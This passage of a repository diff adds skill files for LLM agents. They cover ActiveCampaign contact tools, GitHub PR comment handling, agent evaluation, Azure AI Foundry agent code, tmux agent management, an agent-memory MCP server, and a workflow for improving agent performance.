- `organization_name`: Contact's organization
- `job_title`: Contact's job title
- `tags`: Comma-separated list of tags to apply

**Pitfalls**:
- `email` is the only required field for contact creation
- Phone search uses a general search parameter internally; it may return partial matches
- When combining `email` and `phone` in FIND_CONTACT, results are filtered client-side
- Tags provided during creation are applied immediately
- Creating a contact with an existing email may update the existing contact

### 2. Manage Contact Tags

**When to use**: User wants to add or remove tags from contacts

**Tool sequence**:
1. `ACTIVE_CAMPAIGN_FIND_CONTACT` - Find contact by email or ID [Prerequisite]
2. `ACTIVE_CAMPAIGN_MANAGE_CONTACT_TAG` - Add or remove tags [Required]

**Key parameters**:
- `action`: 'Add' or 'Remove' (required)
- `tags`: Tag names as comma-separated string or array of strings (required)
- `contact_id`: Contact ID (provide this or contact_email)
- `contact_email`: Contact email address (alternative to contact_id)

**Pitfalls**:
- `action` values are capitalized: 'Add' or 'Remove' (not lowercase)
- Tags can be a comma-separated string ('tag1, tag2') or an array (['tag1', 'tag2'])
- Either `contact_id` or `contact_email` must be provided; `contact_id` takes precedence
- Adding a tag that does not exist creates it automatically
- Removing a non-existent tag is a no-op (does not error)

### 3. Manage List Subscriptions

**When to use**: User wants to subscribe or unsubscribe contacts from lists

**Tool sequence**:
1. `ACTIVE_CAMPAIGN_FIND_CONTACT` - Find the contact [Prerequisite]
2. `ACTIVE_CAMPAIGN_MANAGE_LIST_SUBSCRIPTION` - Subscribe or unsubscribe [Required]

**Key parameters**:
- `action`: 'subscribe' or 'unsubscribe' (required)
- `list_id`: Numeric list ID string (required)
- `email`: Contact email address (provide this or contact_id)
- `contact_id`: Numeric contact ID string (alternative to email)

**Pitfalls**:
- `action` values are lowercase: 'subscribe' or 'unsubscribe'
- `list_id` is a numeric string (e.g., '2'), not the list name
- List IDs can be retrieved via the GET /api/3/lists endpoint (not available as a Composio tool; use the ActiveCampaign UI)
- If both `email` and `contact_id` are provided, `contact_id` takes precedence
- Unsubscribing changes status to '2' (unsubscribed) but the relationship record persists

### 4. Add Contacts to Automations

**When to use**: User wants to enroll a contact in an automation workflow

**Tool sequence**:
1. `ACTIVE_CAMPAIGN_FIND_CONTACT` - Verify the contact exists [Prerequisite]
2. `ACTIVE_CAMPAIGN_ADD_CONTACT_TO_AUTOMATION` - Enroll the contact in the automation [Required]

**Key parameters**:
- `contact_email`: Email of the contact to enroll (required)
- `automation_id`: ID of the target automation (required)

**Pitfalls**:
- The contact must already exist in ActiveCampaign
- Automations can only be created through the ActiveCampaign UI, not via API
- `automation_id` must reference an existing, active automation
- The tool performs a two-step process: look up the contact by email, then enroll
- Automation IDs can be found in the ActiveCampaign UI or via GET /api/3/automations

### 5. Create Contact Tasks

**When to use**: User wants to create follow-up tasks associated with contacts

**Tool sequence**:
1. `ACTIVE_CAMPAIGN_FIND_CONTACT` - Find the contact to associate the task with [Prerequisite]
2. `ACTIVE_CAMPAIGN_CREATE_CONTACT_TASK` - Create the task [Required]

**Key parameters**:
- `relid`: Contact ID to associate the task with (required)
- `duedate`: Due date in ISO 8601 format with timezone (required, e.g., '2025-01-15T14:30:00-05:00')
- `dealTasktype`: Task type ID based on available types (required)
- `title`: Task title
- `note`: Task description/content
- `assignee`: User ID to assign the task to
- `edate`: End date in ISO 8601 format (must be later than duedate)
- `status`: 0 for incomplete, 1 for complete

**Pitfalls**:
- `duedate` must be a valid ISO 8601 datetime with timezone offset; do NOT use placeholder values
- `edate` must be later than `duedate`
- `dealTasktype` is a string ID referencing task types configured in ActiveCampaign
- `relid` is the numeric contact ID, not the email address
- `assignee` is a user ID; resolve user names to IDs via the ActiveCampaign UI

## Common Patterns

### Contact Lookup Flow

```
1. Call ACTIVE_CAMPAIGN_FIND_CONTACT with email
2. If found, extract contact ID for subsequent operations
3. If not found, create contact with ACTIVE_CAMPAIGN_CREATE_CONTACT
4. Use contact ID for tags, subscriptions, or automations
```

### Bulk Contact Tagging

```
1. For each contact, call ACTIVE_CAMPAIGN_MANAGE_CONTACT_TAG
2. Use contact_email to avoid separate lookup calls
3. Batch with reasonable delays to respect rate limits
```

### ID Resolution

**Contact email -> Contact ID**:
```
1. Call ACTIVE_CAMPAIGN_FIND_CONTACT with email
2. Extract id from the response
```

## Known Pitfalls

**Action Capitalization**:
- Tag actions: 'Add', 'Remove' (capitalized)
- Subscription actions: 'subscribe', 'unsubscribe' (lowercase)
- Mixing up capitalization causes errors

**ID Types**:
- Contact IDs: numeric strings (e.g., '123')
- List IDs: numeric strings
- Automation IDs: numeric strings
- All IDs should be passed as strings, not integers

**Automations**:
- Automations cannot be created via API; only enrollment is possible
- The automation must be active to accept new contacts
- Enrolling a contact already in the automation may have no effect

**Rate Limits**:
- ActiveCampaign API has rate limits per account
- Implement backoff on 429 responses
- Batch operations should be spaced appropriately

**Response Parsing**:
- Response data may be nested under `data` or `data.data`
- Parse defensively with fallback patterns
- Contact search may return multiple results; match by email for accuracy

## Quick Reference

| Task | Tool Slug | Key Params |
|------|-----------|------------|
| Find contact | ACTIVE_CAMPAIGN_FIND_CONTACT | email, id, phone |
| Create contact | ACTIVE_CAMPAIGN_CREATE_CONTACT | email, first_name, last_name, tags |
| Add/remove tags | ACTIVE_CAMPAIGN_MANAGE_CONTACT_TAG | action, tags, contact_email |
| Subscribe/unsubscribe | ACTIVE_CAMPAIGN_MANAGE_LIST_SUBSCRIPTION | action, list_id, email |
| Add to automation | ACTIVE_CAMPAIGN_ADD_CONTACT_TO_AUTOMATION | contact_email, automation_id |
| Create task | ACTIVE_CAMPAIGN_CREATE_CONTACT_TASK | relid, duedate, dealTasktype, title |

## When to Use

Use this skill whenever you need to automate ActiveCampaign contacts, tags, list subscriptions, automation enrollment, or tasks through Rube MCP.
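Building a valid `duedate`/`edate` pair is easy to get wrong; a minimal sketch with Python's standard library (the UTC-5 offset and the one-hour task length are only examples; use the account's timezone):

```python
from datetime import datetime, timedelta, timezone

# Example: a task due 2025-01-15 14:30 in a UTC-5 timezone, ending an hour later.
tz = timezone(timedelta(hours=-5))
due = datetime(2025, 1, 15, 14, 30, tzinfo=tz)

duedate = due.isoformat()                      # ISO 8601 with offset
edate = (due + timedelta(hours=1)).isoformat()  # must be later than duedate

print(duedate)  # 2025-01-15T14:30:00-05:00
```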
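The lookup flow above can be sketched as a small helper. Here `call_tool` and the response keys (`contacts`, `contact`) are hypothetical stand-ins for however your client invokes Rube MCP tools and parses their output; confirm the real schemas via `RUBE_SEARCH_TOOLS` before relying on them:

```python
def find_or_create_contact(call_tool, email, **fields):
    """Find-or-create sketch.

    `call_tool(slug, params)` is a hypothetical injected callable that runs a
    Rube MCP tool and returns its parsed response as a dict; the response
    shapes below are illustrative assumptions, not a documented schema.
    """
    found = call_tool("ACTIVE_CAMPAIGN_FIND_CONTACT", {"email": email})
    contacts = found.get("contacts") or []
    if contacts:
        return contacts[0]["id"]  # reuse the existing contact
    created = call_tool("ACTIVE_CAMPAIGN_CREATE_CONTACT", {"email": email, **fields})
    return created["contact"]["id"]
```

Injecting `call_tool` keeps the flow testable without a live connection.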
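The backoff-on-429 advice can be sketched as a generic retry wrapper. `make_request` and its `status_code` attribute are illustrative placeholders rather than a specific client library's API:

```python
import time

def call_with_backoff(make_request, max_retries=5, base_delay=1.0):
    """Retry a request on HTTP 429 with exponential backoff.

    `make_request` is any zero-argument callable returning an object with a
    `status_code` attribute (an assumed, requests-like shape).
    """
    for attempt in range(max_retries):
        response = make_request()
        if response.status_code != 429:
            return response
        time.sleep(base_delay * (2 ** attempt))  # 1s, 2s, 4s, ...
    raise RuntimeError("rate limited after retries")
```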
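The defensive-parsing advice can be sketched as one small helper that unwraps a payload nested under zero or more `data` keys (the nesting depth is the only assumption):

```python
def extract_payload(response):
    """Unwrap tool responses that may nest the payload under `data` or `data.data`."""
    payload = response
    while isinstance(payload, dict) and isinstance(payload.get("data"), (dict, list)):
        payload = payload["data"]
    return payload
```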
61
packages/llm/skills/address-github-comments/SKILL.md
Normal file
@ -0,0 +1,61 @@
---
name: address-github-comments
description: "Use when you need to address review or issue comments on an open GitHub Pull Request using the gh CLI."
risk: unknown
source: community
date_added: "2026-02-27"
---

# Address GitHub Comments

## Overview

Efficiently address PR review comments or issue feedback using the GitHub CLI (`gh`). This skill ensures all feedback is addressed systematically.

## Prerequisites

Ensure `gh` is authenticated.

```bash
gh auth status
```

If not logged in, run `gh auth login`.

## Workflow

### 1. Inspect Comments

Fetch the comments for the current branch's PR.

```bash
gh pr view --comments
```

Or use a custom script if available to list threads.

### 2. Categorize and Plan

- List the comments and review threads.
- Propose a fix for each.
- **Wait for user confirmation** on which comments to address first if there are many.

### 3. Apply Fixes

Apply the code changes for the selected comments.

### 4. Respond to Comments

Once fixed, respond to the threads as resolved.

```bash
gh pr comment <PR_NUMBER> --body "Addressed in latest commit."
```

## Common Mistakes

- **Applying fixes without understanding context**: Always read the surrounding code of a comment.
- **Not verifying auth**: Check `gh auth status` before starting.

## When to Use

Use this skill when you need to work through review or issue comments on an open GitHub Pull Request with the `gh` CLI.
69
packages/llm/skills/agent-evaluation/SKILL.md
Normal file
@ -0,0 +1,69 @@
---
name: agent-evaluation
description: "Testing and benchmarking LLM agents including behavioral testing, capability assessment, reliability metrics, and production monitoring—where even top agents achieve less than 50% on re..."
risk: unknown
source: "vibeship-spawner-skills (Apache 2.0)"
date_added: "2026-02-27"
---

# Agent Evaluation

You're a quality engineer who has seen agents that aced benchmarks fail spectacularly in
production. You've learned that evaluating LLM agents is fundamentally different from
testing traditional software—the same input can produce different outputs, and "correct"
often has no single answer.

You've built evaluation frameworks that catch issues before production: behavioral regression
tests, capability assessments, and reliability metrics. You understand that the goal isn't
a 100% test pass rate.

## Capabilities

- agent-testing
- benchmark-design
- capability-assessment
- reliability-metrics
- regression-testing

## Requirements

- testing-fundamentals
- llm-fundamentals

## Patterns

### Statistical Test Evaluation

Run tests multiple times and analyze result distributions

### Behavioral Contract Testing

Define and test agent behavioral invariants

### Adversarial Testing

Actively try to break agent behavior

## Anti-Patterns

### ❌ Single-Run Testing

### ❌ Only Happy Path Tests

### ❌ Output String Matching

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Agent scores well on benchmarks but fails in production | high | Bridge benchmark and production evaluation |
| Same test passes sometimes, fails other times | high | Handle flaky tests in LLM agent evaluation |
| Agent optimized for metric, not actual task | medium | Multi-dimensional evaluation to prevent gaming |
| Test data accidentally used in training or prompts | critical | Prevent data leakage in agent evaluation |

## Related Skills

Works well with: `multi-agent-orchestration`, `agent-communication`, `autonomous-agents`

## When to Use

Use this skill when testing, benchmarking, or monitoring LLM agents, especially when results must be reliable across repeated runs.
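The multiple-run idea can be sketched as a tiny harness. `run_agent` and `check` are caller-supplied placeholders for the agent invocation and the behavioral contract; the point is the distribution, not any single run:

```python
def evaluate_agent(run_agent, check, trials=20):
    """Run a nondeterministic agent repeatedly and estimate its pass rate.

    `run_agent()` produces one output; `check(output)` returns True when the
    output meets the behavioral contract. Both are supplied by the caller.
    """
    results = [bool(check(run_agent())) for _ in range(trials)]
    pass_rate = sum(results) / trials
    # Standard error of the estimated pass rate (normal approximation).
    stderr = (pass_rate * (1 - pass_rate) / trials) ** 0.5
    return pass_rate, stderr
```

Gating a release on "pass rate at least X over N trials" is far more robust than a single green run.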
338
packages/llm/skills/agent-framework-azure-ai-py/SKILL.md
Normal file
@ -0,0 +1,338 @@
---
name: agent-framework-azure-ai-py
description: "Build Azure AI Foundry agents using the Microsoft Agent Framework Python SDK (agent-framework-azure-ai). Use when creating persistent agents with AzureAIAgentsProvider, using hosted tools (code int..."
risk: unknown
source: community
date_added: "2026-02-27"
---

# Agent Framework Azure Hosted Agents

Build persistent agents on Azure AI Foundry using the Microsoft Agent Framework Python SDK.

## Architecture

```
User Query → AzureAIAgentsProvider → Azure AI Agent Service (Persistent)
                    ↓
        Agent.run() / Agent.run_stream()
                    ↓
  Tools: Functions | Hosted (Code/Search/Web) | MCP
                    ↓
       AgentThread (conversation persistence)
```

## Installation

```bash
# Full framework (recommended)
pip install agent-framework --pre

# Or Azure-specific package only
pip install agent-framework-azure-ai --pre
```

## Environment Variables

```bash
export AZURE_AI_PROJECT_ENDPOINT="https://<project>.services.ai.azure.com/api/projects/<project-id>"
export AZURE_AI_MODEL_DEPLOYMENT_NAME="gpt-4o-mini"
export BING_CONNECTION_ID="your-bing-connection-id"  # For web search
```

## Authentication

```python
from azure.identity.aio import AzureCliCredential, DefaultAzureCredential

# Development
credential = AzureCliCredential()

# Production
credential = DefaultAzureCredential()
```

## Core Workflow

### Basic Agent

```python
import asyncio
from agent_framework.azure import AzureAIAgentsProvider
from azure.identity.aio import AzureCliCredential

async def main():
    async with (
        AzureCliCredential() as credential,
        AzureAIAgentsProvider(credential=credential) as provider,
    ):
        agent = await provider.create_agent(
            name="MyAgent",
            instructions="You are a helpful assistant.",
        )

        result = await agent.run("Hello!")
        print(result.text)

asyncio.run(main())
```

### Agent with Function Tools

```python
from typing import Annotated
from pydantic import Field
from agent_framework.azure import AzureAIAgentsProvider
from azure.identity.aio import AzureCliCredential

def get_weather(
    location: Annotated[str, Field(description="City name to get weather for")],
) -> str:
    """Get the current weather for a location."""
    return f"Weather in {location}: 72°F, sunny"

def get_current_time() -> str:
    """Get the current UTC time."""
    from datetime import datetime, timezone
    return datetime.now(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")

async def main():
    async with (
        AzureCliCredential() as credential,
        AzureAIAgentsProvider(credential=credential) as provider,
    ):
        agent = await provider.create_agent(
            name="WeatherAgent",
            instructions="You help with weather and time queries.",
            tools=[get_weather, get_current_time],  # Pass functions directly
        )

        result = await agent.run("What's the weather in Seattle?")
        print(result.text)
```

### Agent with Hosted Tools

```python
from agent_framework import (
    HostedCodeInterpreterTool,
    HostedFileSearchTool,
    HostedWebSearchTool,
)
from agent_framework.azure import AzureAIAgentsProvider
from azure.identity.aio import AzureCliCredential

async def main():
    async with (
        AzureCliCredential() as credential,
        AzureAIAgentsProvider(credential=credential) as provider,
    ):
        agent = await provider.create_agent(
            name="MultiToolAgent",
            instructions="You can execute code, search files, and search the web.",
            tools=[
                HostedCodeInterpreterTool(),
                HostedWebSearchTool(name="Bing"),
            ],
        )

        result = await agent.run("Calculate the factorial of 20 in Python")
        print(result.text)
```

### Streaming Responses

```python
async def main():
    async with (
        AzureCliCredential() as credential,
        AzureAIAgentsProvider(credential=credential) as provider,
    ):
        agent = await provider.create_agent(
            name="StreamingAgent",
            instructions="You are a helpful assistant.",
        )

        print("Agent: ", end="", flush=True)
        async for chunk in agent.run_stream("Tell me a short story"):
            if chunk.text:
                print(chunk.text, end="", flush=True)
        print()
```

### Conversation Threads

```python
from agent_framework.azure import AzureAIAgentsProvider
from azure.identity.aio import AzureCliCredential

async def main():
    async with (
        AzureCliCredential() as credential,
        AzureAIAgentsProvider(credential=credential) as provider,
    ):
        agent = await provider.create_agent(
            name="ChatAgent",
            instructions="You are a helpful assistant.",
            tools=[get_weather],
        )

        # Create thread for conversation persistence
        thread = agent.get_new_thread()

        # First turn
        result1 = await agent.run("What's the weather in Seattle?", thread=thread)
        print(f"Agent: {result1.text}")

        # Second turn - context is maintained
        result2 = await agent.run("What about Portland?", thread=thread)
        print(f"Agent: {result2.text}")

        # Save thread ID for later resumption
        print(f"Conversation ID: {thread.conversation_id}")
```

### Structured Outputs

```python
from pydantic import BaseModel, ConfigDict
from agent_framework.azure import AzureAIAgentsProvider
from azure.identity.aio import AzureCliCredential

class WeatherResponse(BaseModel):
    model_config = ConfigDict(extra="forbid")

    location: str
    temperature: float
    unit: str
    conditions: str

async def main():
    async with (
        AzureCliCredential() as credential,
        AzureAIAgentsProvider(credential=credential) as provider,
    ):
        agent = await provider.create_agent(
            name="StructuredAgent",
            instructions="Provide weather information in structured format.",
            response_format=WeatherResponse,
        )

        result = await agent.run("Weather in Seattle?")
        weather = WeatherResponse.model_validate_json(result.text)
        print(f"{weather.location}: {weather.temperature}°{weather.unit}")
```

## Provider Methods

| Method | Description |
|--------|-------------|
| `create_agent()` | Create new agent on Azure AI service |
| `get_agent(agent_id)` | Retrieve existing agent by ID |
| `as_agent(sdk_agent)` | Wrap SDK Agent object (no HTTP call) |

## Hosted Tools Quick Reference

| Tool | Import | Purpose |
|------|--------|---------|
| `HostedCodeInterpreterTool` | `from agent_framework import HostedCodeInterpreterTool` | Execute Python code |
| `HostedFileSearchTool` | `from agent_framework import HostedFileSearchTool` | Search vector stores |
| `HostedWebSearchTool` | `from agent_framework import HostedWebSearchTool` | Bing web search |
| `HostedMCPTool` | `from agent_framework import HostedMCPTool` | Service-managed MCP |
| `MCPStreamableHTTPTool` | `from agent_framework import MCPStreamableHTTPTool` | Client-managed MCP |

## Complete Example

```python
import asyncio
from typing import Annotated
from pydantic import BaseModel, Field
from agent_framework import (
    HostedCodeInterpreterTool,
    HostedWebSearchTool,
    MCPStreamableHTTPTool,
)
from agent_framework.azure import AzureAIAgentsProvider
from azure.identity.aio import AzureCliCredential


def get_weather(
    location: Annotated[str, Field(description="City name")],
) -> str:
    """Get weather for a location."""
    return f"Weather in {location}: 72°F, sunny"


class AnalysisResult(BaseModel):
    summary: str
    key_findings: list[str]
    confidence: float


async def main():
    async with (
        AzureCliCredential() as credential,
        MCPStreamableHTTPTool(
            name="Docs MCP",
            url="https://learn.microsoft.com/api/mcp",
        ) as mcp_tool,
        AzureAIAgentsProvider(credential=credential) as provider,
    ):
        agent = await provider.create_agent(
            name="ResearchAssistant",
            instructions="You are a research assistant with multiple capabilities.",
            tools=[
                get_weather,
                HostedCodeInterpreterTool(),
                HostedWebSearchTool(name="Bing"),
                mcp_tool,
            ],
        )

        thread = agent.get_new_thread()

        # Non-streaming
        result = await agent.run(
            "Search for Python best practices and summarize",
            thread=thread,
        )
        print(f"Response: {result.text}")

        # Streaming
        print("\nStreaming: ", end="")
        async for chunk in agent.run_stream("Continue with examples", thread=thread):
            if chunk.text:
                print(chunk.text, end="", flush=True)
        print()

        # Structured output
        result = await agent.run(
            "Analyze findings",
            thread=thread,
            response_format=AnalysisResult,
        )
        analysis = AnalysisResult.model_validate_json(result.text)
        print(f"\nConfidence: {analysis.confidence}")


if __name__ == "__main__":
    asyncio.run(main())
```

## Conventions

- Always use async context managers: `async with provider:`
- Pass functions directly to the `tools=` parameter (auto-converted to AIFunction)
- Use `Annotated[type, Field(description=...)]` for function parameters
- Use `get_new_thread()` for multi-turn conversations
- Prefer `HostedMCPTool` for service-managed MCP, `MCPStreamableHTTPTool` for client-managed

## Reference Files

- references/tools.md: Detailed hosted tool patterns
- references/mcp.md: MCP integration (hosted + local)
- references/threads.md: Thread and conversation management
- references/advanced.md: OpenAPI, citations, structured outputs

## When to Use

Use this skill when building persistent Azure AI Foundry agents with the Microsoft Agent Framework Python SDK (`agent-framework-azure-ai`).
43
packages/llm/skills/agent-manager-skill/SKILL.md
Normal file
@ -0,0 +1,43 @@
---
name: agent-manager-skill
description: "Manage multiple local CLI agents via tmux sessions (start/stop/monitor/assign) with cron-friendly scheduling."
risk: unknown
source: community
date_added: "2026-02-27"
---

# Agent Manager Skill

## When to use

Use this skill when you need to:

- run multiple local CLI agents in parallel (separate tmux sessions)
- start/stop agents and tail their logs
- assign tasks to agents and monitor output
- schedule recurring agent work (cron)

## Prerequisites

Install `agent-manager-skill` in your workspace:

```bash
git clone https://github.com/fractalmind-ai/agent-manager-skill.git
```

## Common commands

```bash
python3 agent-manager/scripts/main.py doctor
python3 agent-manager/scripts/main.py list
python3 agent-manager/scripts/main.py start EMP_0001
python3 agent-manager/scripts/main.py monitor EMP_0001 --follow
python3 agent-manager/scripts/main.py assign EMP_0002 <<'EOF'
Follow teams/fractalmind-ai-maintenance.md Workflow
EOF
```

## Notes

- Requires `tmux` and `python3`.
- Agents are configured under an `agents/` directory (see the repo for examples).
87
packages/llm/skills/agent-memory-mcp/SKILL.md
Normal file
@ -0,0 +1,87 @@
---
name: agent-memory-mcp
description: "A hybrid memory system that provides persistent, searchable knowledge management for AI agents (Architecture, Patterns, Decisions)."
risk: unknown
source: community
date_added: "2026-02-27"
---

# Agent Memory Skill

This skill provides a persistent, searchable memory bank that automatically syncs with project documentation. It runs as an MCP server that exposes reading, writing, and searching of long-term memories.

## Prerequisites

- Node.js (v18+)

## Setup

1. **Clone the Repository**:
   Clone the `agentMemory` project into your agent's workspace or a parallel directory:

```bash
git clone https://github.com/webzler/agentMemory.git .agent/skills/agent-memory
```

2. **Install Dependencies**:

```bash
cd .agent/skills/agent-memory
npm install
npm run compile
```

3. **Start the MCP Server**:
   Use the helper script to activate the memory bank for your current project:

```bash
npm run start-server <project_id> <absolute_path_to_target_workspace>
```

_Example for the current directory:_

```bash
npm run start-server my-project $(pwd)
```

## Capabilities (MCP Tools)

### `memory_search`

Search for memories by query, type, or tags.

- **Args**: `query` (string), `type?` (string), `tags?` (string[])
- **Usage**: "Find all authentication patterns" -> `memory_search({ query: "authentication", type: "pattern" })`

### `memory_write`

Record new knowledge or decisions.

- **Args**: `key` (string), `type` (string), `content` (string), `tags?` (string[])
- **Usage**: "Save this architecture decision" -> `memory_write({ key: "auth-v1", type: "decision", content: "..." })`

### `memory_read`

Retrieve specific memory content by key.

- **Args**: `key` (string)
- **Usage**: "Get the auth design" -> `memory_read({ key: "auth-v1" })`

### `memory_stats`

View analytics on memory usage.

- **Usage**: "Show memory statistics" -> `memory_stats({})`
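The tool arguments are plain JSON objects; a hypothetical exchange might look like this (keys taken from the Args lists above, values invented for illustration):

```python
# Hypothetical MCP tool-call payloads matching the argument shapes above.
search_args = {"query": "authentication", "type": "pattern"}
write_args = {
    "key": "auth-v1",
    "type": "decision",
    "content": "Use JWT access tokens with short expiry.",
    "tags": ["auth", "security"],
}
read_args = {"key": "auth-v1"}

# An MCP client would send e.g. {"name": "memory_write", "arguments": write_args}.
```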
## Dashboard

This skill includes a standalone dashboard to visualize memory usage.

```bash
npm run start-dashboard <absolute_path_to_target_workspace>
```

Access it at: `http://localhost:3333`

## When to Use

Use this skill to execute the workflow or actions described in the overview.
72
packages/llm/skills/agent-memory-systems/SKILL.md
Normal file
@ -0,0 +1,72 @@
---
name: agent-memory-systems
description: "Memory is the cornerstone of intelligent agents. Without it, every interaction starts from zero. This skill covers the architecture of agent memory: short-term (context window), long-term (vector s..."
risk: unknown
source: "vibeship-spawner-skills (Apache 2.0)"
date_added: "2026-02-27"
---

# Agent Memory Systems

You are a cognitive architect who understands that memory makes agents intelligent.
You've built memory systems for agents handling millions of interactions. You know
that the hard part isn't storing - it's retrieving the right memory at the right time.

Your core insight: Memory failures look like intelligence failures. When an agent
"forgets" or gives inconsistent answers, it's almost always a retrieval problem,
not a storage problem. You obsess over chunking strategies, embedding quality,
and retrieval.

## Capabilities

- agent-memory
- long-term-memory
- short-term-memory
- working-memory
- episodic-memory
- semantic-memory
- procedural-memory
- memory-retrieval
- memory-formation
- memory-decay

## Patterns

### Memory Type Architecture

Choosing the right memory type for different information

### Vector Store Selection Pattern

Choosing the right vector database for your use case

### Chunking Strategy Pattern

Breaking documents into retrievable chunks
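A minimal sketch of the chunking pattern above (fixed-size character chunks with overlap; a real system would also chunk on semantic boundaries and test retrieval quality against each candidate size):

```python
def chunk_text(text: str, size: int = 200, overlap: int = 50) -> list[str]:
    """Split text into overlapping fixed-size chunks for embedding."""
    if overlap >= size:
        raise ValueError("overlap must be smaller than chunk size")
    step = size - overlap  # how far each new chunk advances
    return [text[i:i + size] for i in range(0, len(text), step)]
```

Overlap preserves context at chunk boundaries so a fact split across two chunks is still retrievable from at least one of them.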
## Anti-Patterns

### ❌ Store Everything Forever

### ❌ Chunk Without Testing Retrieval

### ❌ Single Memory Type for All Data

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Issue | critical | Contextual chunking (Anthropic's approach) |
| Issue | high | Test different chunk sizes |
| Issue | high | Always filter by metadata first |
| Issue | high | Add temporal scoring |
| Issue | medium | Detect conflicts on storage |
| Issue | medium | Budget tokens for different memory types |
| Issue | medium | Track the embedding model in metadata |

## Related Skills

Works well with: `autonomous-agents`, `multi-agent-orchestration`, `llm-architect`, `agent-tool-builder`

## When to Use

Use this skill to execute the workflow or actions described in the overview.
352
packages/llm/skills/agent-orchestration-improve-agent/SKILL.md
Normal file
@ -0,0 +1,352 @@
---
name: agent-orchestration-improve-agent
description: "Systematic improvement of existing agents through performance analysis, prompt engineering, and continuous iteration."
risk: unknown
source: community
date_added: "2026-02-27"
---

# Agent Performance Optimization Workflow

Systematic improvement of existing agents through performance analysis, prompt engineering, and continuous iteration.

[Extended thinking: Agent optimization requires a data-driven approach combining performance metrics, user feedback analysis, and advanced prompt engineering techniques. Success depends on systematic evaluation, targeted improvements, and rigorous testing with rollback capabilities for production safety.]

## Use this skill when

- Improving an existing agent's performance or reliability
- Analyzing failure modes, prompt quality, or tool usage
- Running structured A/B tests or evaluation suites
- Designing iterative optimization workflows for agents

## Do not use this skill when

- You are building a brand-new agent from scratch
- There are no metrics, feedback, or test cases available
- The task is unrelated to agent performance or prompt quality

## Instructions

1. Establish baseline metrics and collect representative examples.
2. Identify failure modes and prioritize high-impact fixes.
3. Apply prompt and workflow improvements with measurable goals.
4. Validate with tests and roll out changes in controlled stages.

## Safety

- Avoid deploying prompt changes without regression testing.
- Roll back quickly if quality or safety metrics regress.

## Phase 1: Performance Analysis and Baseline Metrics

Comprehensive analysis of agent performance using context-manager for historical data collection.

### 1.1 Gather Performance Data

```
Use: context-manager
Command: analyze-agent-performance $ARGUMENTS --days 30
```

Collect metrics including:

- Task completion rate (successful vs. failed tasks)
- Response accuracy and factual correctness
- Tool usage efficiency (correct tools, call frequency)
- Average response time and token consumption
- User satisfaction indicators (corrections, retries)
- Hallucination incidents and error patterns

### 1.2 User Feedback Pattern Analysis

Identify recurring patterns in user interactions:

- **Correction patterns**: Where users consistently modify outputs
- **Clarification requests**: Common areas of ambiguity
- **Task abandonment**: Points where users give up
- **Follow-up questions**: Indicators of incomplete responses
- **Positive feedback**: Successful patterns to preserve

### 1.3 Failure Mode Classification

Categorize failures by root cause:

- **Instruction misunderstanding**: Role or task confusion
- **Output format errors**: Structure or formatting issues
- **Context loss**: Long-conversation degradation
- **Tool misuse**: Incorrect or inefficient tool selection
- **Constraint violations**: Safety or business rule breaches
- **Edge case handling**: Unusual input scenarios

### 1.4 Baseline Performance Report

Generate quantitative baseline metrics:

```
Performance Baseline:
- Task Success Rate: [X%]
- Average Corrections per Task: [Y]
- Tool Call Efficiency: [Z%]
- User Satisfaction Score: [1-10]
- Average Response Latency: [Xms]
- Token Efficiency Ratio: [X:Y]
```
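The baseline report above can be computed from a simple task log; a sketch (the record field names are assumptions):

```python
def baseline_metrics(tasks: list[dict]) -> dict:
    """Compute baseline metrics from a list of task records.

    Each record is assumed to have 'success' (bool) and
    'corrections' (int) fields.
    """
    total = len(tasks)
    return {
        "task_success_rate": sum(t["success"] for t in tasks) / total,
        "avg_corrections_per_task": sum(t["corrections"] for t in tasks) / total,
    }
```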
## Phase 2: Prompt Engineering Improvements

Apply advanced prompt optimization techniques using the prompt-engineer agent.

### 2.1 Chain-of-Thought Enhancement

Implement structured reasoning patterns:

```
Use: prompt-engineer
Technique: chain-of-thought-optimization
```

- Add explicit reasoning steps: "Let's approach this step-by-step..."
- Include self-verification checkpoints: "Before proceeding, verify that..."
- Implement recursive decomposition for complex tasks
- Add reasoning trace visibility for debugging

### 2.2 Few-Shot Example Optimization

Curate high-quality examples from successful interactions:

- **Select diverse examples** covering common use cases
- **Include edge cases** that previously failed
- **Show both positive and negative examples** with explanations
- **Order examples** from simple to complex
- **Annotate examples** with key decision points

Example structure:

```
Good Example:
Input: [User request]
Reasoning: [Step-by-step thought process]
Output: [Successful response]
Why this works: [Key success factors]

Bad Example:
Input: [Similar request]
Output: [Failed response]
Why this fails: [Specific issues]
Correct approach: [Fixed version]
```

### 2.3 Role Definition Refinement

Strengthen agent identity and capabilities:

- **Core purpose**: Clear, single-sentence mission
- **Expertise domains**: Specific knowledge areas
- **Behavioral traits**: Personality and interaction style
- **Tool proficiency**: Available tools and when to use them
- **Constraints**: What the agent should NOT do
- **Success criteria**: How to measure task completion

### 2.4 Constitutional AI Integration

Implement self-correction mechanisms:

```
Constitutional Principles:
1. Verify factual accuracy before responding
2. Self-check for potential biases or harmful content
3. Validate output format matches requirements
4. Ensure response completeness
5. Maintain consistency with previous responses
```

Add critique-and-revise loops:

- Initial response generation
- Self-critique against principles
- Automatic revision if issues are detected
- Final validation before output

### 2.5 Output Format Tuning

Optimize response structure:

- **Structured templates** for common tasks
- **Dynamic formatting** based on complexity
- **Progressive disclosure** for detailed information
- **Markdown optimization** for readability
- **Code block formatting** with syntax highlighting
- **Table and list generation** for data presentation

## Phase 3: Testing and Validation

Comprehensive testing framework with A/B comparison.

### 3.1 Test Suite Development

Create representative test scenarios:

```
Test Categories:
1. Golden path scenarios (common successful cases)
2. Previously failed tasks (regression testing)
3. Edge cases and corner scenarios
4. Stress tests (complex, multi-step tasks)
5. Adversarial inputs (potential breaking points)
6. Cross-domain tasks (combining capabilities)
```

### 3.2 A/B Testing Framework

Compare the original vs. improved agent:

```
Use: parallel-test-runner
Config:
- Agent A: Original version
- Agent B: Improved version
- Test set: 100 representative tasks
- Metrics: Success rate, speed, token usage
- Evaluation: Blind human review + automated scoring
```

Statistical significance testing:

- Minimum sample size: 100 tasks per variant
- Confidence level: 95% (p < 0.05)
- Effect size calculation (Cohen's d)
- Power analysis for future tests
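A sketch of the significance check for two success rates (a standard two-proportion z-test; |z| > 1.96 corresponds roughly to p < 0.05, two-sided):

```python
from math import sqrt


def two_proportion_z(successes_a: int, n_a: int, successes_b: int, n_b: int) -> float:
    """z-statistic for the difference between two success proportions."""
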